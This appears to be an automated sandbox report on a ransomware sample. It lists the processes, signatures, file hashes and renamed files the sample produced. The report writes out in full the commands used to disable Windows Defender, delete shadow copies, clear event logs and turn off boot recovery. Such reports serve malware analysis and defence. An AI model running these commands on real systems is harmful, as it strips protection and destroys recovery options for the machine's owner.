reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ResetCopy.doc"
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2471F11BCFE9CE298581B2318EC712B6
Network
Files
memory/796-55-0x0000000000000000-mapping.dmp
memory/588-56-0x0000000000000000-mapping.dmp
memory/268-57-0x0000000000000000-mapping.dmp
memory/908-58-0x0000000000000000-mapping.dmp
memory/1088-59-0x0000000000000000-mapping.dmp
memory/1652-60-0x0000000000000000-mapping.dmp
memory/1400-61-0x0000000000000000-mapping.dmp
memory/1804-62-0x0000000000000000-mapping.dmp
memory/832-63-0x0000000000000000-mapping.dmp
memory/1796-64-0x0000000000000000-mapping.dmp
memory/1068-65-0x0000000000000000-mapping.dmp
memory/1872-66-0x0000000000000000-mapping.dmp
memory/1664-67-0x0000000000000000-mapping.dmp
memory/1520-68-0x0000000000000000-mapping.dmp
memory/1828-69-0x0000000000000000-mapping.dmp
memory/1632-70-0x0000000000000000-mapping.dmp
memory/1032-71-0x0000000000000000-mapping.dmp
memory/1692-72-0x0000000000000000-mapping.dmp
memory/1784-73-0x0000000000000000-mapping.dmp
memory/1908-74-0x0000000000000000-mapping.dmp
memory/568-75-0x0000000000000000-mapping.dmp
memory/1716-76-0x0000000000000000-mapping.dmp
memory/916-77-0x0000000000000000-mapping.dmp
memory/2024-78-0x0000000000000000-mapping.dmp
memory/1616-79-0x0000000000000000-mapping.dmp
memory/520-80-0x0000000000000000-mapping.dmp
memory/468-81-0x0000000000000000-mapping.dmp
memory/544-82-0x0000000000000000-mapping.dmp
memory/584-83-0x0000000000000000-mapping.dmp
memory/1804-84-0x0000000000000000-mapping.dmp
memory/1132-85-0x0000000000000000-mapping.dmp
memory/1264-86-0x0000000000000000-mapping.dmp
memory/1448-87-0x0000000000000000-mapping.dmp
memory/1556-88-0x0000000000000000-mapping.dmp
memory/1836-89-0x0000000000000000-mapping.dmp
memory/1748-90-0x0000000000000000-mapping.dmp
memory/700-91-0x0000000000000000-mapping.dmp
memory/1944-92-0x0000000000000000-mapping.dmp
memory/1188-93-0x0000000000000000-mapping.dmp
memory/1924-94-0x0000000000000000-mapping.dmp
memory/1612-95-0x0000000000000000-mapping.dmp
memory/1592-96-0x0000000000000000-mapping.dmp
memory/688-97-0x0000000000000000-mapping.dmp
memory/432-98-0x0000000000000000-mapping.dmp
memory/1100-99-0x0000000000000000-mapping.dmp
memory/1808-100-0x0000000000000000-mapping.dmp
memory/1632-101-0x0000000000000000-mapping.dmp
memory/2032-102-0x0000000000000000-mapping.dmp
memory/2008-103-0x0000000000000000-mapping.dmp
memory/1912-104-0x0000000000000000-mapping.dmp
memory/1820-105-0x0000000000000000-mapping.dmp
memory/360-106-0x0000000000000000-mapping.dmp
memory/1356-107-0x0000000000000000-mapping.dmp
memory/380-108-0x0000000000000000-mapping.dmp
memory/1872-109-0x0000000000000000-mapping.dmp
memory/1008-110-0x0000000000000000-mapping.dmp
memory/1108-111-0x0000000000000000-mapping.dmp
memory/1196-112-0x0000000000000000-mapping.dmp
memory/908-113-0x0000000000000000-mapping.dmp
memory/908-114-0x000007FEFB801000-0x000007FEFB803000-memory.dmp
memory/1224-115-0x0000000000000000-mapping.dmp
memory/1744-117-0x0000000000000000-mapping.dmp
memory/1888-119-0x0000000000000000-mapping.dmp
memory/560-120-0x0000000000000000-mapping.dmp
memory/588-121-0x0000000000000000-mapping.dmp
memory/1624-123-0x00000000027D0000-0x00000000027D2000-memory.dmp
memory/1624-125-0x00000000027D2000-0x00000000027D4000-memory.dmp
memory/1624-126-0x00000000027D4000-0x00000000027D7000-memory.dmp
memory/1624-124-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4e04a52b484aee0fc50290488e694010 |
| SHA1 | 85a67593fae58158b3183b8c63ca87fdaa59353d |
| SHA256 | 2dd9767036c8ac01daaf6bf6005da9544427816c071264ec0f906a638ad29b88 |
| SHA512 | 93c0517b8c7e052cbf64e722857fd6b62a17d857fbfaa37811face54a85a2c7377ef128c373dc3af51f8d0681ba11beb5c02180d0283787d54242ecc014ed6d5 |
memory/1624-129-0x00000000027DB000-0x00000000027FA000-memory.dmp
memory/2128-130-0x000007FEF1F40000-0x000007FEF2A9D000-memory.dmp
memory/2128-132-0x00000000028B2000-0x00000000028B4000-memory.dmp
memory/2128-131-0x00000000028B0000-0x00000000028B2000-memory.dmp
memory/2128-133-0x00000000028B4000-0x00000000028B7000-memory.dmp
memory/2128-134-0x00000000028BB000-0x00000000028DA000-memory.dmp
memory/2256-135-0x00000000723A1000-0x00000000723A4000-memory.dmp
memory/2256-136-0x000000006FE21000-0x000000006FE23000-memory.dmp
memory/2256-137-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2256-138-0x0000000074F11000-0x0000000074F13000-memory.dmp
\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT532.CNV
| MD5 | f44367f4a0bdcc43329d346762ee4667 |
| SHA1 | ab11b6c514f0e31af10601bd4ec65064f3e664f3 |
| SHA256 | ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058 |
| SHA512 | 8d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2 |
\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT532.CNV
| MD5 | f44367f4a0bdcc43329d346762ee4667 |
| SHA1 | ab11b6c514f0e31af10601bd4ec65064f3e664f3 |
| SHA256 | ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058 |
| SHA512 | 8d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2 |
\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT532.CNV
| MD5 | f44367f4a0bdcc43329d346762ee4667 |
| SHA1 | ab11b6c514f0e31af10601bd4ec65064f3e664f3 |
| SHA256 | ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058 |
| SHA512 | 8d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2 |
C:\Users\Admin\Desktop\~$setCopy.doc
| MD5 | b9be1af7c38499ca4e84b0d2cf06d6e8 |
| SHA1 | f545a60f9d46ae915a8b5c04c25f124822c6cc48 |
| SHA256 | 2df9569b22c738ad3ea5fd1ca731be8d9a70f3397ee50b9e0fcca838604a6567 |
| SHA512 | bdb560599564a82fbda5e9b058c28eadb3e9c8aebf0d035bb03a8564d6f0a80cd1323a41fce6f07499a9e2797bcd92d436b315a85b6c57c19f186b06fa4784be |
C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1
| MD5 | 230f2df42a22d6ee66d0fc015e9606b9 |
| SHA1 | cba72993428c4cffba468f9812e5ffe258e6df73 |
| SHA256 | 09e05f7be5d85dbe92bd7dfce70456b8d81330d0f6a6857a3a15c46cd2a937b3 |
| SHA512 | c05cd4a74fe96be75779af7b86064a5c8caecc8e40383ca589b3c29166fe5bc88df71bd7c2057956bf3fbb4b44acf617d81e491dada115c8e1cad3229b18790e |
\Users\Admin\AppData\Local\Temp\Setup00000a28\OSETUP.DLL
| MD5 | fcc38158c5d62a39e1ba79a29d532240 |
| SHA1 | eca2d1e91c634bc8a4381239eb05f30803636c24 |
| SHA256 | e51a5292a06674cdbbcea240084b65186aa1dd2bc3316f61ff433d9d9f542a74 |
| SHA512 | 0d224474a9358863e4bb8dacc48b219376d9cc89cea13f8d0c6f7b093dd420ceb185eb4d649e5bd5246758419d0531922b4f351df8ad580b3baa0fab88d89ec7 |
\Users\Admin\AppData\Local\Temp\Setup00000a28\OSETUPUI.DLL
| MD5 | 196a884e700b7eb09b2cd0a48eccbc3a |
| SHA1 | a400c341adaf960022fe4f97ab477e0ab1e02a96 |
| SHA256 | 12babd301ab2f5a0cd35226d4939e1e200d5fcf90694a25690df7ad0ea28b55a |
| SHA512 | b9f0229e3ed822b79ab2ffa41b67343215bde419a44c638422734f75191f2359bcfeb3553189e17a89b5edfa25016484ec78df48eb05049c72b1d393dd3f4041 |
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9a96c32645eced2c829796814ea241ee |
| SHA1 | ae6d8eb74657d54d1abcaa63cc9013be8f13b528 |
| SHA256 | 043e7c44937f3677c28acd3d7eb76ec10f843058bc39935377bdebdb857b4c2d |
| SHA512 | ca3e0be4dc51beb4195fd8657b35ecd33254802552ce64cbb9010a055827927fd0b44b8ddf513e429b651bb8e2e42a731c181aaf7db428e8114980bfe57223e6 |
\Users\Admin\AppData\Local\Temp\Setup00000a9c\OSETUP.DLL
| MD5 | fcc38158c5d62a39e1ba79a29d532240 |
| SHA1 | eca2d1e91c634bc8a4381239eb05f30803636c24 |
| SHA256 | e51a5292a06674cdbbcea240084b65186aa1dd2bc3316f61ff433d9d9f542a74 |
| SHA512 | 0d224474a9358863e4bb8dacc48b219376d9cc89cea13f8d0c6f7b093dd420ceb185eb4d649e5bd5246758419d0531922b4f351df8ad580b3baa0fab88d89ec7 |
\Users\Admin\AppData\Local\Temp\Setup00000a9c\OSETUPUI.DLL
| MD5 | 196a884e700b7eb09b2cd0a48eccbc3a |
| SHA1 | a400c341adaf960022fe4f97ab477e0ab1e02a96 |
| SHA256 | 12babd301ab2f5a0cd35226d4939e1e200d5fcf90694a25690df7ad0ea28b55a |
| SHA512 | b9f0229e3ed822b79ab2ffa41b67343215bde419a44c638422734f75191f2359bcfeb3553189e17a89b5edfa25016484ec78df48eb05049c72b1d393dd3f4041 |
C:\Windows\Installer\MSI78F7.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
\Windows\Installer\MSI78F7.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
\Windows\Installer\MSI79F2.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
C:\Windows\Installer\MSI79F2.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
C:\Windows\Installer\MSI7A41.tmp
| MD5 | 9cadbfa797783ff9e7fc60301de9e1ff |
| SHA1 | 83bde6d6b75dfc88d3418ec1a2e935872b8864bb |
| SHA256 | c1eda5c42be64cfc08408a276340c9082f424ec1a4e96e78f85e9f80d0634141 |
| SHA512 | 095963d9e01d46dae7908e3de6f115d7a0eebb114a5ec6e4e9312dbc22ba5baa268f5acece328066c9456172e90a95e097a35b9ed61589ce9684762e38f1385b |
\Windows\Installer\MSI7A41.tmp
| MD5 | 9cadbfa797783ff9e7fc60301de9e1ff |
| SHA1 | 83bde6d6b75dfc88d3418ec1a2e935872b8864bb |
| SHA256 | c1eda5c42be64cfc08408a276340c9082f424ec1a4e96e78f85e9f80d0634141 |
| SHA512 | 095963d9e01d46dae7908e3de6f115d7a0eebb114a5ec6e4e9312dbc22ba5baa268f5acece328066c9456172e90a95e097a35b9ed61589ce9684762e38f1385b |
C:\Windows\Installer\MSI7A70.tmp
| MD5 | 4a843a97ae51c310b573a02ffd2a0e8e |
| SHA1 | 063fa914ccb07249123c0d5f4595935487635b20 |
| SHA256 | 727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086 |
| SHA512 | 905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2 |
\Windows\Installer\MSI7A70.tmp
| MD5 | 4a843a97ae51c310b573a02ffd2a0e8e |
| SHA1 | 063fa914ccb07249123c0d5f4595935487635b20 |
| SHA256 | 727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086 |
| SHA512 | 905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2 |
C:\Windows\Installer\MSI7AFE.tmp
| MD5 | 4a843a97ae51c310b573a02ffd2a0e8e |
| SHA1 | 063fa914ccb07249123c0d5f4595935487635b20 |
| SHA256 | 727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086 |
| SHA512 | 905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2 |
\Windows\Installer\MSI7AFE.tmp
| MD5 | 4a843a97ae51c310b573a02ffd2a0e8e |
| SHA1 | 063fa914ccb07249123c0d5f4595935487635b20 |
| SHA256 | 727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086 |
| SHA512 | 905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2 |
C:\Windows\Installer\MSI7B5C.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
\Windows\Installer\MSI7B5C.tmp
| MD5 | d1f5ce6b23351677e54a245f46a9f8d2 |
| SHA1 | 0d5c6749401248284767f16df92b726e727718ca |
| SHA256 | 57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc |
| SHA512 | 960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba |
C:\Windows\Installer\MSI7BBB.tmp
| MD5 | 5577a98daef4ba33e900a3e3108d6cc1 |
| SHA1 | 5af817186ab0376a0433686be470ea2b48c74f5f |
| SHA256 | 148199b4f3b6b2030e2aeb63a66e8e333e692d38691bcbe39139cf02bb61b31d |
| SHA512 | d37d511975b5331a5b1cdda736890c7d4f2dcba4abac2b9399c977bdb7e09c964327e3f771cd592e2632b0e776545c490f29fd391ec13c7948557957cd805dd5 |
\Windows\Installer\MSI7BBB.tmp
| MD5 | 5577a98daef4ba33e900a3e3108d6cc1 |
| SHA1 | 5af817186ab0376a0433686be470ea2b48c74f5f |
| SHA256 | 148199b4f3b6b2030e2aeb63a66e8e333e692d38691bcbe39139cf02bb61b31d |
| SHA512 | d37d511975b5331a5b1cdda736890c7d4f2dcba4abac2b9399c977bdb7e09c964327e3f771cd592e2632b0e776545c490f29fd391ec13c7948557957cd805dd5 |
C:\Windows\Installer\MSI7BDB.tmp
| MD5 | 5a1e6b155435693938596d58eaca74bb |
| SHA1 | 27fb323ccc215136ef350469072b6ad559d39c3d |
| SHA256 | f2d5eb947b85f763f72de7f800118844a5207c9e3dd456f13186c2aaf0c485ac |
| SHA512 | 4fee8576ef5541d4923aacb514b09e1e4dc8d6cbb1dcaada67c65240358147b971c2a1d034faf50c594ae7edb4a3c68dd4ffbbb69893413ffb52e71a86c65388 |
\Windows\Installer\MSI7BDB.tmp
| MD5 | 5a1e6b155435693938596d58eaca74bb |
| SHA1 | 27fb323ccc215136ef350469072b6ad559d39c3d |
| SHA256 | f2d5eb947b85f763f72de7f800118844a5207c9e3dd456f13186c2aaf0c485ac |
| SHA512 | 4fee8576ef5541d4923aacb514b09e1e4dc8d6cbb1dcaada67c65240358147b971c2a1d034faf50c594ae7edb4a3c68dd4ffbbb69893413ffb52e71a86c65388 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:26
Reported
2022-01-13 13:31
Platform
win10-en-20211208
Max time kernel
32s
Max time network
143s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__JgAAACYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__BAAAAAQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ppd.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-compat.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MgAAADIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Grace-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NgAAADYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\History.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
